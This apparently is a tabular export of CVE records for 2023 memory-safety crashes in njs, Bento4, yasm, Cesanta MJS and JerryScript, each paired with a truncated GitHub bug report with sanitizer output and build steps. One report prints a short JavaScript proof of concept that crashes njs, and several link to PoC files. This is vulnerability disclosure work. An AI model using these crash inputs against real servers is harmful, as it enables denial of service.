"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/nginx/njs/issues/619"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:0.7.10:*:*:*:*:*:*:*",
"matchCriteriaId": "2784ECC5-66FE-4666-9B7B-6DC080357DEE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": nu... | https://github.com/nginx/njs/issues/619 | [
"Issue Tracking",
"Patch"
] | github.com | [
"nginx",
"njs"
] | This is new one, different from another
Poc will be upload later
Asan
```
==20795==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fd4936f313f bp 0x7ffd1d582440 sp 0x7ffd1d581bf8 T0)
==20795==The signal is caused by a WRITE memory access.
==20795==Hint: address points to the zero page.
... | illegal memcpy during njs_vmcode_return in src/njs_vmcode.c | https://api.github.com/repos/nginx/njs/issues/619/comments | 0 | 2023-02-24T08:36:06Z | 2023-03-04T01:12:48Z | https://github.com/nginx/njs/issues/619 | 1,598,176,339 | 619 |
CVE-2023-27730 | 2023-04-09T20:15:56.780 | Nginx NJS v0.7.10 was discovered to contain a segmentation violation via the function njs_lvlhsh_find at src/njs_lvlhsh.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/nginx/njs/issues/615"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:0.7.10:*:*:*:*:*:*:*",
"matchCriteriaId": "2784ECC5-66FE-4666-9B7B-6DC080357DEE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": nu... | https://github.com/nginx/njs/issues/615 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"nginx",
"njs"
] | Environment
```
commit: 4c1e23326e1c30e4e051bf588bfc1aaa63954976
version: 0.7.10
Build :
./configure --cc=clang --address-sanitizer=YES
make
```
Poc
```js
const v1 = URIError();
v1.name = URIError();
URIError && v1;
```
Asan
```
==21471==ERROR: AddressSanitizer: SEGV on unknown address... | SEGV src/njs_lvlhsh.c:176:16 in njs_lvlhsh_find | https://api.github.com/repos/nginx/njs/issues/615/comments | 0 | 2023-02-21T02:38:22Z | 2023-02-28T06:16:13Z | https://github.com/nginx/njs/issues/615 | 1,592,687,556 | 615 |
CVE-2023-29576 | 2023-04-11T21:15:30.510 | Bento4 v1.6.0-639 was discovered to contain a segmentation violation via the AP4_TrunAtom::SetDataOffset(int) function in Ap4TrunAtom.h. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/844"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://git... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*",
"matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/axiomatic-systems/Bento4/issues/844 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"axiomatic-systems",
"Bento4"
] |
# Summary
Hello, I found SEGV bug in Ap4TrunAtom.h
# BUG
SEGV /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4TrunAtom.h:80:80 in AP4_TrunAtom::SetDataOffset(int)
# Build
ubuntu 20.04
```
export CC=clang
export CXX=clang++
export CFLAGS="-fsanitize=address -g"
export CXXFLAGS="-fsanitize=a... | SEGV Ap4TrunAtom.h:80:80 in AP4_TrunAtom::SetDataOffset(int) | https://api.github.com/repos/axiomatic-systems/Bento4/issues/844/comments | 0 | 2023-03-14T12:42:26Z | 2024-02-17T17:48:33Z | https://github.com/axiomatic-systems/Bento4/issues/844 | 1,623,402,397 | 844 |
CVE-2023-29574 | 2023-04-12T13:15:07.637 | Bento4 v1.6.0-639 was discovered to contain an out-of-memory bug in the mp42avc component. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/841"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*",
"matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/axiomatic-systems/Bento4/issues/841 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] |
# Summary
Hello, I found out-of-memory bug in mp42avc
# BUG
out-of-memory (/home/ubuntu/fuzz/asan_bento4/Bento4/cmakebuild/mp42avc+0x4c44dd) in operator new(unsigned long)
# Build
ubuntu 20.04
```
export CC=clang
export CXX=clang++
export CFLAGS="-fsanitize=address -g"
export CXXFLAGS="-fsanitize=... | out-of-memory in mp42avc | https://api.github.com/repos/axiomatic-systems/Bento4/issues/841/comments | 1 | 2023-03-14T02:40:15Z | 2024-02-17T17:49:29Z | https://github.com/axiomatic-systems/Bento4/issues/841 | 1,622,623,759 | 841 |
CVE-2023-29580 | 2023-04-12T13:15:07.727 | yasm 1.3.0.55.g101bc was discovered to contain a segmentation violation via the component yasm_expr_create at /libyasm/expr.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/yasm/yasm/issues/215"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/z... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.55.g101bc:*:*:*:*:*:*:*",
"matchCriteriaId": "4A03B4FD-736D-40B7-87B0-AC4EF2660C4B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versio... | https://github.com/yasm/yasm/issues/215 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"yasm",
"yasm"
] | # SEGV yasm/libyasm/expr.c:87:44 in yasm_expr_create
## project address
https://github.com/yasm/yasm
## info
OS:Ubuntu20.04 TLS
Build: ./autogen.sh && make distclean && CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./config... | SEGV yasm/libyasm/expr.c:87:44 in yasm_expr_create | https://api.github.com/repos/yasm/yasm/issues/215/comments | 1 | 2023-03-31T07:56:32Z | 2024-03-21T12:41:09Z | https://github.com/yasm/yasm/issues/215 | 1,648,868,122 | 215 |
CVE-2023-29571 | 2023-04-12T15:15:13.233 | Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via gc_sweep at src/mjs_gc.c. This vulnerability can lead to a Denial of Service (DoS). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/241"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding... | https://github.com/cesanta/mjs/issues/241 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | # SEGV src/mjs_gc.c:190:11 in gc_sweep
## project address
https://github.com/cesanta/mjs
## info
OS:Ubuntu20.04 TLS
Build: `$(DOCKER_CLANG) -fsanitize=address $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)`
## Poc
https://github.com/z1r00/fuzz_vuln/blob/main/mjs/SEGV/mjs_gc/poc6.zip
... | SEGV src/mjs_gc.c:190:11 in gc_sweep | https://api.github.com/repos/cesanta/mjs/issues/241/comments | 0 | 2023-03-06T01:35:33Z | 2023-03-06T01:35:33Z | https://github.com/cesanta/mjs/issues/241 | 1,610,494,409 | 241 |
CVE-2023-29581 | 2023-04-12T16:15:19.603 | yasm 1.3.0.55.g101bc has a segmentation violation in the function delete_Token at modules/preprocs/nasm/nasm-pp.c. NOTE: although a libyasm application could become unavailable if this were exploited, the vendor's position is that there is no security relevance because there is either supposed to be input validation be... | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2186333"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/yasm/yasm/blob/master/SECURITY.md"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.55.g101bc:*:*:*:*:*:*:*",
"matchCriteriaId": "4A03B4FD-736D-40B7-87B0-AC4EF2660C4B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versio... | https://github.com/yasm/yasm/issues/216 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"yasm",
"yasm"
] | # SEGV yasm/modules/preprocs/nasm/nasm-pp.c in delete_Token
## project address
https://github.com/yasm/yasm
## info
OS:Ubuntu20.04 TLS
Build: ./autogen.sh && make distclean && CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" .... | SEGV yasm/modules/preprocs/nasm/nasm-pp.c in delete_Token | https://api.github.com/repos/yasm/yasm/issues/216/comments | 13 | 2023-03-31T08:02:18Z | 2024-03-22T12:02:52Z | https://github.com/yasm/yasm/issues/216 | 1,648,877,295 | 216 |
CVE-2023-29573 | 2023-04-13T20:15:16.690 | Bento4 v1.6.0-639 was discovered to contain an out-of-memory bug in the mp4info component. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/840"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gi... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*",
"matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/axiomatic-systems/Bento4/issues/840 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] |
# Summary
Hello, I found out-of-memory bug in mp4info
# BUG
out-of-memory (/home/ubuntu/fuzz/Bento4_fuzz/asan/Bento4/cmakebuild/mp4info+0x4c44ed) in operator new(unsigned long)
# Build
ubuntu 20.04
```
export CC=clang
export CXX=clang++
export CFLAGS="-fsanitize=address -g"
export CXXFLAGS="-fsani... | out-of-memory in mp4info | https://api.github.com/repos/axiomatic-systems/Bento4/issues/840/comments | 0 | 2023-03-14T02:26:20Z | 2024-02-17T17:08:01Z | https://github.com/axiomatic-systems/Bento4/issues/840 | 1,622,614,615 | 840 |
CVE-2023-29569 | 2023-04-14T12:15:07.770 | Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via ffi_cb_impl_wpwwwww at src/mjs_ffi.c. This vulnerability can lead to a Denial of Service (DoS). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/239"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "https://github.com/z1r00/fuzz_vuln/blob/main/mjs... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding... | https://github.com/cesanta/mjs/issues/239 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | # SEGV src/mjs_ffi.c:456 in ffi_cb_impl_wpwwwww
## project address
https://github.com/cesanta/mjs
## info
OS:Ubuntu20.04 TLS
Build: `$(DOCKER_CLANG) -fsanitize=address $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)`
## Poc
https://github.com/z1r00/fuzz_vuln/blob/main/mjs/SEGV/mjs_ffi... | SEGV src/mjs_ffi.c:456 in ffi_cb_impl_wpwwwww | https://api.github.com/repos/cesanta/mjs/issues/239/comments | 0 | 2023-03-06T01:14:12Z | 2023-03-06T01:14:12Z | https://github.com/cesanta/mjs/issues/239 | 1,610,480,695 | 239 |
CVE-2023-29575 | 2023-04-21T14:15:07.373 | Bento4 v1.6.0-639 was discovered to contain an out-of-memory bug in the mp42aac component. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory",
"Vendor Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/842"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*",
"matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/axiomatic-systems/Bento4/issues/842 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory",
"Vendor Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] |
# Summary
Hello, I found out-of-memory bug in mp42aac
# BUG
out-of-memory (/home/ubuntu/fuzz/asan_bento4/Bento4/cmakebuild/mp42aac+0x4c44dd) in operator new(unsigned long)
# Build
ubuntu 20.04
```
export CC=clang
export CXX=clang++
export CFLAGS="-fsanitize=address -g"
export CXXFLAGS="-fsanitize=... | out-of-memory in mp42aac | https://api.github.com/repos/axiomatic-systems/Bento4/issues/842/comments | 1 | 2023-03-14T02:50:05Z | 2024-02-17T17:52:59Z | https://github.com/axiomatic-systems/Bento4/issues/842 | 1,622,631,441 | 842 |
CVE-2023-29579 | 2023-04-24T13:15:07.440 | yasm 1.3.0.55.g101bc was discovered to contain a stack overflow via the component yasm/yasm+0x43b466 in vsprintf. Note: This has been disputed by third parties who argue this is a bug and not a security issue because yasm is a standalone program not designed to run untrusted code. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/yasm/yasm/issues/214"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "https://github.com/z1r00/fuzz_vuln/blob/main/yasm/stack-buffer-overflow/yasm/rea... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.55.g101bc:*:*:*:*:*:*:*",
"matchCriteriaId": "4A03B4FD-736D-40B7-87B0-AC4EF2660C4B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versio... | https://github.com/yasm/yasm/issues/214 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"yasm",
"yasm"
] | # stack-buffer-overflow yasm/yasm+0x43b466 in vsprintf
## project address
https://github.com/yasm/yasm
## info
OS:Ubuntu20.04 TLS
Build: ./autogen.sh && make distclean && CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./conf... | stack-buffer-overflow yasm/yasm+0x43b466 in vsprintf | https://api.github.com/repos/yasm/yasm/issues/214/comments | 1 | 2023-03-30T13:06:13Z | 2024-03-21T12:42:39Z | https://github.com/yasm/yasm/issues/214 | 1,647,586,741 | 214 |
CVE-2023-29582 | 2023-04-24T13:15:07.483 | yasm 1.3.0.55.g101bc was discovered to contain a stack overflow via the function parse_expr1 at /nasm/nasm-parse.c. Note: This has been disputed by third parties who argue this is a bug and not a security issue because yasm is a standalone program not designed to run untrusted code. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2189601#c3"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/yasm/yasm/issues/217"
},
{
"source": "cve@mitre.org",
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.55.g101bc:*:*:*:*:*:*:*",
"matchCriteriaId": "4A03B4FD-736D-40B7-87B0-AC4EF2660C4B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versio... | https://github.com/yasm/yasm/issues/217 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"yasm",
"yasm"
] | # stack-overflow yasm/modules/parsers/nasm/nasm-parse.c:1235 in parse_expr1
## project address
https://github.com/yasm/yasm
## info
OS:Ubuntu20.04 TLS
Build: ./autogen.sh && make distclean && CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-fra... | stack-overflow yasm/modules/parsers/nasm/nasm-parse.c:1235 in parse_expr1 | https://api.github.com/repos/yasm/yasm/issues/217/comments | 1 | 2023-03-31T08:22:30Z | 2024-03-22T11:56:45Z | https://github.com/yasm/yasm/issues/217 | 1,648,921,272 | 217 |
CVE-2023-29583 | 2023-04-24T13:15:07.523 | yasm 1.3.0.55.g101bc was discovered to contain a stack overflow via the function parse_expr5 at /nasm/nasm-parse.c. Note: This has been disputed by third parties who argue this is a bug and not a security issue because yasm is a standalone program not designed to run untrusted code. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/yasm/yasm/issues/218"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "https://github.com/z1r00/fuzz_vuln/blob/main/yasm/stack-overflow/parse_expr5/rea... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.55.g101bc:*:*:*:*:*:*:*",
"matchCriteriaId": "4A03B4FD-736D-40B7-87B0-AC4EF2660C4B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versio... | https://github.com/yasm/yasm/issues/218 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"yasm",
"yasm"
] | # stack-overflow yasm/modules/parsers/nasm/nasm-parse.c:1303 in parse_expr5
## project address
https://github.com/yasm/yasm
## info
OS:Ubuntu20.04 TLS
Build: ./autogen.sh && make distclean && CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-fram... | stack-overflow yasm/modules/parsers/nasm/nasm-parse.c:1303 in parse_expr5 | https://api.github.com/repos/yasm/yasm/issues/218/comments | 1 | 2023-03-31T08:27:44Z | 2024-03-22T11:55:05Z | https://github.com/yasm/yasm/issues/218 | 1,648,929,873 | 218 |
CVE-2023-29570 | 2023-04-24T14:15:07.800 | Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via mjs_ffi_cb_free at src/mjs_ffi.c. This vulnerability can lead to a Denial of Service (DoS). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/240"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding... | https://github.com/cesanta/mjs/issues/240 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | # SEGV src/mjs_ffi.c:982:24 in mjs_ffi_cb_free
## project address
https://github.com/cesanta/mjs
## info
OS:Ubuntu20.04 TLS
Build: `$(DOCKER_CLANG) -fsanitize=address $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)`
## Poc
https://github.com/z1r00/fuzz_vuln/blob/main/mjs/SEGV/mjs_fii2... | SEGV src/mjs_ffi.c:982:24 in mjs_ffi_cb_free | https://api.github.com/repos/cesanta/mjs/issues/240/comments | 0 | 2023-03-06T01:27:09Z | 2023-03-06T01:27:09Z | https://github.com/cesanta/mjs/issues/240 | 1,610,488,659 | 240 |
CVE-2023-30406 | 2023-04-24T22:15:09.627 | Jerryscript commit 1a2c047 was discovered to contain a segmentation violation via the component ecma_find_named_property at /base/ecma-helpers.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5058"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4EB495C8-348F-4B04-B31F-1F4EE471CC22",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | https://github.com/jerryscript-project/jerryscript/issues/5058 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
1a2c04763aba49f52b1537acd3730098c873511c
###### Build platform
Ubuntu 20.04.2 LTS (Linux 5.15.0-67-generic x86_64)
###### Build steps
Describe how to build JerryScript. Give all the necessary details of the build
(e.g., environment variables, command(s), profile, command line optio... | Segmentation fault in jerry | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5058/comments | 5 | 2023-03-28T06:12:27Z | 2023-04-26T19:22:43Z | https://github.com/jerryscript-project/jerryscript/issues/5058 | 1,643,268,712 | 5,058 |
CVE-2023-30408 | 2023-04-24T22:15:09.677 | Jerryscript commit 1a2c047 was discovered to contain a segmentation violation via the component build/bin/jerry. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5057"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4EB495C8-348F-4B04-B31F-1F4EE471CC22",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | https://github.com/jerryscript-project/jerryscript/issues/5057 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | First of all, when reporting a bug, give the issue a descriptive title.
In the body of the issue, optionally give a free-form text description of the
bug. Give the context necessary for others to understand the problem.
Then, provide information necessary to reproduce the bug.
Omit sections that are irrelevant ... | Segmentation fault in jerry | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5057/comments | 1 | 2023-03-27T09:25:43Z | 2023-04-26T19:24:26Z | https://github.com/jerryscript-project/jerryscript/issues/5057 | 1,641,737,938 | 5,057 |
CVE-2023-30410 | 2023-04-24T22:15:09.743 | Jerryscript commit 1a2c047 was discovered to contain a stack overflow via the component ecma_op_function_construct at /operations/ecma-function-object.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5052"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4EB495C8-348F-4B04-B31F-1F4EE471CC22",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | https://github.com/jerryscript-project/jerryscript/issues/5052 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
1a2c04763aba49f52b1537acd3730098c873511c
###### Build platform
Name the build platform. E.g., copy the output of
Ubuntu Lunar Lobster (development branch) (Linux 5.15.0-67-generic x86_64)
###### Build steps
```sh
python3 tools/build.py --builddir=asan --compile-flag=-fno-omit-fram... | jerry crashed while running the following code. | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5052/comments | 1 | 2023-03-15T06:57:23Z | 2023-04-26T19:26:13Z | https://github.com/jerryscript-project/jerryscript/issues/5052 | 1,624,874,619 | 5,052 |
CVE-2023-30414 | 2023-04-24T22:15:09.807 | Jerryscript commit 1a2c047 was discovered to contain a stack overflow via the component vm_loop at /jerry-core/vm/vm.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
